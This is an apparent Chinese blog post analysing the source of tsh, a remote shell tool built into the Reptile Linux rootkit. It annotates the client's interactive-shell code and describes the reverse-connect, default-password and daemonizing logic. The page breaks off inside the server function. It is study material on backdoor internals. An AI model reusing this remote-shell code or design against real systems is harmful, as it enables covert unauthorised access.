

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="
 tsh是一款轻量级远程shell工具，可在多个平台上编译运行，被集成在较为完善的Linux rootkit Reptile 中

其实现了文件传输和真正的交互shell，交互全程用aes和sha1加密

代码量比socat小，但很精巧，适合初级红队开发者进行学习

本篇的关键在 tty和pty的设置与使用，其余涉及一点点信号、网络、多进程操作、IO模型会简略提一下


">
  <meta name="author" content="Shawn">
  <meta name="keywords" content="">
  
  <title>Tsh源码阅读和分析 - P3aceSh4wn&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="P3aceSh4wn's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Tsh源码阅读和分析">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-11-23 23:07" pubdate>
        November 23, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      46
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Tsh源码阅读和分析</h1>
            
            <div class="markdown-body">
              <blockquote>
<p> tsh是一款轻量级远程shell工具，可在多个平台上编译运行，被集成在较为完善的Linux rootkit <a href="https://github.com/f0rb1dd3n/Reptile" target="_blank" rel="noopener">Reptile</a> 中</p>
<ul>
<li><p>其实现了文件传输和真正的交互shell，交互全程用aes和sha1加密</p>
</li>
<li><p>代码量比socat小，但很精巧，适合初级红队开发者进行学习</p>
</li>
<li><p>本篇的关键在 <strong>tty和pty的设置与使用</strong>，其余涉及一点点<strong>信号</strong>、<strong>网络</strong>、<strong>多进程操作</strong>、<strong>IO模型</strong>会简略提一下</p>
</li>
</ul>
</blockquote>
<a id="more"></a>


<h2 id="0x00-目录结构"><a href="#0x00-目录结构" class="headerlink" title="0x00 目录结构"></a>0x00 目录结构</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c">tsh<br>├── aes.c <span class="hljs-meta"># aes加密算法实现</span><br>├── aes.h <span class="hljs-meta"># aes头文件</span><br>├── ChangeLog <br>├── Makefile <span class="hljs-meta"># makefile中带有多种系统的简单编译选项</span><br>├── pel.c <span class="hljs-meta"># packet encrypt layer 报文加密的逻辑实现</span><br>├── pel.h # 报文加密头文件<br>├── README<br>├── sha1.c # sha1加密算法实现<br>├── sha1.h # sha1头文件<br>├── tsh.c <span class="hljs-meta"># tsh客户端实现</span><br>├── tshd.c <span class="hljs-meta"># tsh服务端实现</span><br>└── tsh.h <span class="hljs-meta"># tsh头文件</span><br></code></pre></td></tr></table></figure>

<h2 id="0x01-主逻辑分析"><a href="#0x01-主逻辑分析" class="headerlink" title="0x01 主逻辑分析"></a>0x01 主逻辑分析</h2><p>为了保证加密传输，作者将加密逻辑抽象出来形成 <code>pel.[ch]（packet encrypt layer）</code>，对外提供4个接口，方便主逻辑调用</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">pel_client_init</span><span class="hljs-params">( <span class="hljs-keyword">int</span> server, <span class="hljs-keyword">char</span> *key )</span></span>; <span class="hljs-comment">// 初始化client加密</span><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">pel_server_init</span><span class="hljs-params">( <span class="hljs-keyword">int</span> client, <span class="hljs-keyword">char</span> *key )</span></span>; <span class="hljs-comment">// 初始化server加密</span><br><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">pel_send_msg</span><span class="hljs-params">( <span class="hljs-keyword">int</span> sockfd, <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> *msg, <span class="hljs-keyword">int</span>  length )</span></span>; <span class="hljs-comment">// 加密发送消息</span><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">pel_recv_msg</span><span class="hljs-params">( <span class="hljs-keyword">int</span> sockfd, <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> *msg, <span class="hljs-keyword">int</span> *length )</span></span>; <span class="hljs-comment">// 解密接收消息</span><br></code></pre></td></tr></table></figure>



<h3 id="0x11-tsh-client流程"><a href="#0x11-tsh-client流程" class="headerlink" title="0x11 tsh client流程"></a>0x11 tsh client流程</h3><p>通过指定参数，支持三种基本功能</p>
<ul>
<li><p>交互shell</p>
</li>
<li><p>获取文件</p>
</li>
<li><p>传输文件</p>
</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/tsh_client.png" srcset="/img/loading.gif" lazyload alt="tsh_client"></p>
<ul>
<li>输入选项可以指定：IP or 反连、端口、密码、获取文件、发送文件，仅输入IP则默认动作(action)为连接远程shell</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637479146379.png" srcset="/img/loading.gif" lazyload alt="tsh_usage"></p>
<ul>
<li>判断主被动连接<ul>
<li>主动连接，创建socket并bind绑定地址之后，主动使用connect连接远程server。</li>
<li>被动连接，创建socket后bind地址，开启listen监听，使用accept等待连接到来</li>
</ul>
</li>
<li>连接到来后，先发送密码，若没有设置密码，则使用硬编码于代码中的默认密码，如果错误则需要用户手输，再次错误则认证失败。如果用<code>-s</code>设置了密码，错误则直接认证失败</li>
<li>发送我们开头设置的动作(action)，失败则调用shutdown关闭两端的socket</li>
<li>根据我们的action调用不同功能函数，runshell模式中如果设置了命令，则仅执行该命令后便返回</li>
</ul>
<h3 id="0x12-tshd-server流程"><a href="#0x12-tshd-server流程" class="headerlink" title="0x12 tshd server流程"></a>0x12 tshd server流程</h3><p>tshd_server主流程</p>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/tsh_server.png" srcset="/img/loading.gif" lazyload alt="tsh_server"></p>
<ul>
<li>process_init子流程</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/process_client.png" srcset="/img/loading.gif" lazyload alt="process_client"></p>
<ul>
<li>基本参数</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637499011508.png" srcset="/img/loading.gif" lazyload alt="tshd_usage"></p>
<ul>
<li>server主流程使用fork，作用是保证进程后台运行，这样我们运行tshd的时候就不用手动加<code>&amp;</code>符号令进程后台运行</li>
<li>while死循环处理到来连接。被动情况下等待client来连接我们，主动情况下如果连接不成功，则会等待5s，再次发起连接。连接成功时连接会交给process_client函数处理</li>
<li>在process_client流程中，会使用创建孙进程并退出父、子进程的方法，令孙进程由init进程接管，达到避免出现僵尸进程的效果</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">/* setup the packet encryption layer */</span><br><br>alarm( <span class="hljs-number">3</span> );<br><br>ret = pel_server_init( client, secret );<br><br><span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>&#123;<br>    <span class="hljs-built_in">shutdown</span>( client, <span class="hljs-number">2</span> );<br>    <span class="hljs-keyword">return</span>( <span class="hljs-number">10</span> );<br>&#125;<br><span class="hljs-comment">// 这里取消闹钟</span><br>alarm( <span class="hljs-number">0</span> );<br></code></pre></td></tr></table></figure>

<ul>
<li>上面代码中<code>alarm(3)</code>的作用是给当前进程设置一个3秒的时钟，如果<code>pel_server_init</code>处理太慢，则操作系统会发送一个SIGALRM信号中断此进程，达到合理关闭该进程的效果。<code>alarm(0)</code>的作用是 如果流程正常进行，则取消闹钟</li>
</ul>
<h2 id="0x02-关键函数分析"><a href="#0x02-关键函数分析" class="headerlink" title="0x02 关键函数分析"></a>0x02 关键函数分析</h2><h3 id="0x21-tsh-runshell-客户端"><a href="#0x21-tsh-runshell-客户端" class="headerlink" title="0x21 tsh_runshell 客户端"></a>0x21 tsh_runshell 客户端</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">tsh_runshell</span><span class="hljs-params">( <span class="hljs-keyword">int</span> server, <span class="hljs-keyword">char</span> *argv2 )</span><br></span>&#123;<br>    fd_set rd;<br>    <span class="hljs-keyword">char</span> *term;<br>    <span class="hljs-keyword">int</span> ret, len, imf = <span class="hljs-number">0</span>;<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">winsize</span> <span class="hljs-title">ws</span>;</span><br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">termios</span> <span class="hljs-title">tp</span>, <span class="hljs-title">tr</span>;</span><br><br>    <span class="hljs-comment">/* send the TERM environment variable */</span><br>    term = getenv( <span class="hljs-string">"TERM"</span> );<br><br>    <span class="hljs-keyword">if</span>( term == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        term = <span class="hljs-string">"vt100"</span>;<br>    &#125;<br>    len = <span class="hljs-built_in">strlen</span>( term );<br><br>    ret = pel_send_msg( server, (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> *) term, len );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>    &#123;<br>        pel_error( <span class="hljs-string">"pel_send_msg"</span> );<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">22</span> );<br>    &#125;<br><br>	<span class="hljs-comment">// 判断当前文件描述符0是否指的是一个终端，是则返回1</span><br>    <span class="hljs-keyword">if</span>( isatty( <span class="hljs-number">0</span> ) )<br>    &#123;<br>        <span class="hljs-comment">// 交互shell模式</span><br>        imf = <span class="hljs-number">1</span>;<br><br>		<span class="hljs-comment">// ioctl能够对不同设备进行操作</span><br>        <span class="hljs-comment">// 这里是获取终端设备的窗口大小保存在ws中，用于传输给server</span><br>        <span class="hljs-keyword">if</span>( ioctl( <span class="hljs-number">0</span>, TIOCGWINSZ, &amp;ws ) &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            perror( <span class="hljs-string">"ioctl(TIOCGWINSZ)"</span> );<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">23</span> );<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>        <span class="hljs-comment">// 默认窗口大小</span><br>        ws.ws_row = <span class="hljs-number">25</span>;<br>        ws.ws_col = <span class="hljs-number">80</span>;<br>    &#125;<br>	<br>    <span class="hljs-comment">// 把窗口大小数据填充到前四个char类型中，发给server处理</span><br>    message[<span class="hljs-number">0</span>] = ( ws.ws_row &gt;&gt; <span class="hljs-number">8</span> ) &amp; <span class="hljs-number">0xFF</span>;<br>    message[<span class="hljs-number">1</span>] = ( ws.ws_row      ) &amp; <span class="hljs-number">0xFF</span>;<br><br>    message[<span class="hljs-number">2</span>] = ( ws.ws_col &gt;&gt; <span class="hljs-number">8</span> ) &amp; <span class="hljs-number">0xFF</span>;<br>    message[<span class="hljs-number">3</span>] = ( ws.ws_col      ) &amp; <span class="hljs-number">0xFF</span>;<br><br>    ret = pel_send_msg( server, message, <span class="hljs-number">4</span> );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>    &#123;<br>        pel_error( <span class="hljs-string">"pel_send_msg"</span> );<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">24</span> );<br>    &#125;<br><br>    <span class="hljs-comment">/* send the system command */</span><br>    len = <span class="hljs-built_in">strlen</span>( argv2 );<br><br>    ret = pel_send_msg( server, (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> *) argv2, len );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>    &#123;<br>        pel_error( <span class="hljs-string">"pel_send_msg"</span> );<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">25</span> );<br>    &#125;<br><br>    <span class="hljs-comment">/* set the tty to RAW */</span><br>    <span class="hljs-comment">// 判断文件描述符 1是否为tty</span><br>    <span class="hljs-keyword">if</span>( isatty( <span class="hljs-number">1</span> ) )<br>    &#123;<br>        <span class="hljs-comment">// 获取文件描述符 1的属性，存储到tp中，以便后期还原</span><br>        <span class="hljs-keyword">if</span>( tcgetattr( <span class="hljs-number">1</span>, &amp;tp ) &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            perror( <span class="hljs-string">"tcgetattr"</span> );<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">26</span> );<br>        &#125;<br>		<br>        <span class="hljs-comment">// 把tp拷贝到tr中，我们后续修改就用tr</span><br>        <span class="hljs-built_in">memcpy</span>( (<span class="hljs-keyword">void</span> *) &amp;tr, (<span class="hljs-keyword">void</span> *) &amp;tp, <span class="hljs-keyword">sizeof</span>( tr ) );<br><br>        <span class="hljs-comment">// 设置terminal属性</span><br>        tr.c_iflag |= IGNPAR;<br>        tr.c_iflag &amp;= ~(ISTRIP|INLCR|IGNCR|ICRNL|IXON|IXANY|IXOFF);<br>        tr.c_lflag &amp;= ~(ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHONL|IEXTEN);<br>        tr.c_oflag &amp;= ~OPOST;<br><br>        tr.c_cc[VMIN]  = <span class="hljs-number">1</span>;<br>        tr.c_cc[VTIME] = <span class="hljs-number">0</span>;<br><br>       	<span class="hljs-comment">// 设置文件描述符 1的属性</span><br>        <span class="hljs-keyword">if</span>( tcsetattr( <span class="hljs-number">1</span>, TCSADRAIN, &amp;tr ) &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            perror( <span class="hljs-string">"tcsetattr"</span> );<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">27</span> );<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-comment">// select多路复用模型 收发数据</span><br>    <span class="hljs-keyword">while</span>( <span class="hljs-number">1</span> )<br>    &#123;<br>      	<span class="hljs-comment">// 清空rd集合</span><br>        FD_ZERO( &amp;rd );<br><br>        <span class="hljs-keyword">if</span>( imf != <span class="hljs-number">0</span> )<br>        &#123;<br>            <span class="hljs-comment">// 如果是交互模式，那么把标准输入放到rd集合中</span><br>            FD_SET( <span class="hljs-number">0</span>, &amp;rd );<br>        &#125;<br>        <span class="hljs-comment">// 把server标识符放到rd集合中</span><br>        FD_SET( server, &amp;rd );<br>        <br>        <span class="hljs-comment">// select系统调用</span><br>        <span class="hljs-comment">// 当rd中某个被置入的标识符出现可读数据时解除阻塞</span><br>        <span class="hljs-keyword">if</span>( select( server + <span class="hljs-number">1</span>, &amp;rd, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span> ) &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            perror( <span class="hljs-string">"select"</span> );<br>            ret = <span class="hljs-number">28</span>;<br>            <span class="hljs-keyword">break</span>;<br>        &#125;<br><br>		<span class="hljs-comment">// 判断出现可读数据的是否为server标识符</span><br>        <span class="hljs-comment">// 处理server返回信息</span><br>        <span class="hljs-keyword">if</span>( FD_ISSET( server, &amp;rd ) )<br>        &#123;<br>            <span class="hljs-comment">// 接收server数据</span><br>            ret = pel_recv_msg( server, message, &amp;len );<br><br>            <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>            &#123;<br>                <span class="hljs-keyword">if</span>( pel_errno == PEL_CONN_CLOSED )<br>                &#123;<br>                    ret = <span class="hljs-number">0</span>;<br>                &#125;<br>                <span class="hljs-keyword">else</span><br>                &#123;<br>                    pel_error( <span class="hljs-string">"pel_recv_msg"</span> );<br>                    ret = <span class="hljs-number">29</span>;<br>                &#125;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>			<br>            <span class="hljs-comment">// 将数据写入标准输出标识符（即显示到控制台）</span><br>            <span class="hljs-keyword">if</span>( <span class="hljs-built_in">write</span>( <span class="hljs-number">1</span>, message, len ) != len )<br>            &#123;<br>                perror( <span class="hljs-string">"write"</span> );<br>                ret = <span class="hljs-number">30</span>;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>        &#125;<br><br>		<span class="hljs-comment">// 判断出现可读数据的是否为标准输入标识符（即用户输入）</span><br>        <span class="hljs-comment">// 处理用户输入</span><br>        <span class="hljs-keyword">if</span>( imf != <span class="hljs-number">0</span> &amp;&amp; FD_ISSET( <span class="hljs-number">0</span>, &amp;rd ) )<br>        &#123;<br>        	<span class="hljs-comment">// 读取用户的输入到message</span><br>            len = <span class="hljs-built_in">read</span>( <span class="hljs-number">0</span>, message, BUFSIZE );<br><br>            <span class="hljs-keyword">if</span>( len == <span class="hljs-number">0</span> )<br>            &#123;<br>                <span class="hljs-built_in">fprintf</span>( <span class="hljs-built_in">stderr</span>, <span class="hljs-string">"stdin: end-of-file\n"</span> );<br>                ret = <span class="hljs-number">31</span>;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span>( len &lt; <span class="hljs-number">0</span> )<br>            &#123;<br>                perror( <span class="hljs-string">"read"</span> );<br>                ret = <span class="hljs-number">32</span>;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br><br>            <span class="hljs-comment">// 发送给server</span><br>            ret = pel_send_msg( server, message, len );<br><br>            <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>            &#123;<br>                pel_error( <span class="hljs-string">"pel_send_msg"</span> );<br>                ret = <span class="hljs-number">33</span>;<br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>        &#125;<br>    &#125;<br><br>	<span class="hljs-comment">// 恢复之前的terminal数据</span><br>    <span class="hljs-keyword">if</span>( isatty( <span class="hljs-number">1</span> ) )<br>    &#123;<br>        tcsetattr( <span class="hljs-number">1</span>, TCSADRAIN, &amp;tp );<br>    &#125;<br><br>    <span class="hljs-keyword">return</span>( ret );<br>&#125;<br></code></pre></td></tr></table></figure>



<h3 id="0x22-tshd-runshell-服务端"><a href="#0x22-tshd-runshell-服务端" class="headerlink" title="0x22 tshd_runshell 服务端"></a>0x22 tshd_runshell 服务端</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span 